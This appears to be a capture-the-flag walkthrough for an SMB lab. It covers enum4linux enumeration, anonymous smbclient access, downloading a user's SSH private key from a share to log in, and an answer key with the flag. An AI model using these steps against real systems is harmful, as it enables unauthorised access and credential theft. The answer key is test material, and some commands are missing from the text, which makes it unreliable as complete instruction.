Network Services

Enumerate and exploit a variety of network services and misconfigurations...

SMB

This stands for the Server Message Block protocol. It's a client-server communication protocol used for sharing access to files, printers and other resources on a network. Windows & Unix systems run the SMB protocol.

It's known as a response request protocol, meaning that it transmits multiple messages between the client and server to establish a connection and clients will connect with TCP/IP generally.

Once a connection is established, clients can send commands (known as SMB's) to the server to access files, etc. but over a network.

Enumeration

This is the process of gathering information on a target to find potential attack vectors to exploit. This is essential to a successful attack as it can be used to gather information that is valuable to a hacker such as passwords, hostnames, application data and usernames.

Typically, there are SMB shares on a server that can be connected to, to view files and there is sometimes valuable, sensitive information within these shares.

The first step of enumeration is to do a port scan. We have covered Nmap previously. Enum4Linux is a tool to enumerate SMB shares on both Windows & Linux systems. It makes it easy to quickly extract information from the target pertaining to SMB. -pn

The syntax is very easy: enum4linux [options] ip

TAG	FUNCTION
-U	Get user list
-M	Get machine list
-N	Get name list dump
-S	Get share list
-P	Get password policy information
-G	Get the group and member list
-a	Do all of the above (a full enumeration)

Exploitation

Once you have enumerated what we just went through, we now know the SMB share’s name and location. We are going to use smbclient to remotely access the SMB share using the following:

smbclient //10.10.10.10/sharename

You can add tags after the sharename separated by a space such as (-U to specify user and-p to specify a port).

Extra Explanation

This part is aimed to help you solve Task 3 as the syntax of smbclient is very different to normal bash.

The first step is to use smbclient to login via the user Anonymous

We are interested in the file (Working From Home Information.txt). However, tocat that file doesn’t work. For some reason,openfileoropen <file>doesn’t work either.

To open a file

Once that’s done you’ll see that its a letter or note to John Cactus so we are assuming that he is the owner. We can usecdto move into the.sshdirectory and uselsto view the files there. Then go back into the home directory and use the command below to download the file id_rsa:

get .ssh/id_rsa id_rsa

Now go to your machine, and open the file id_rsa and it’ll show a private key. First, change the permissions via chmod. Now, you can ssh into the server like so:

Now we are in the server, we can list the files and find the flag!

---

Answers

Task 2

What does SMB stand for? Server Message Block

What type of protocol is SMB? response-request

What do clients connect to servers using? for every port? TCP/IP

What systems does Samba run on? Unix

Task 3

Conduct a nmap scan of your choosing, How many ports are open? 3

What ports is SMB running on? 139/445

For starters, what is the workgroup name? WORKGROUP

What comes up as the name of the machine? POLOSMB

What operating system version is running? 6.1

What share sticks out as something we might want to investigate? profiles

Task 4

What would be the correct syntax to access an SMB share called “secret” as user “suit” on a machine with the IP 10.10.10.2 on the default port? smbclient //10.10.10.2/secret -U suit -p 445

Does the share allow anonymous access? Y/N? Y

Who can we assume this profile folder belongs to? John Cactus

What service has been configured to allow him to work from home? ssh

Okay! Now we know this, what directory on the share should we look in? .ssh

Which of these keys is most useful to us? id_rsa

What is the smb.txt flag? THM{smb_is_fun_eh?}

---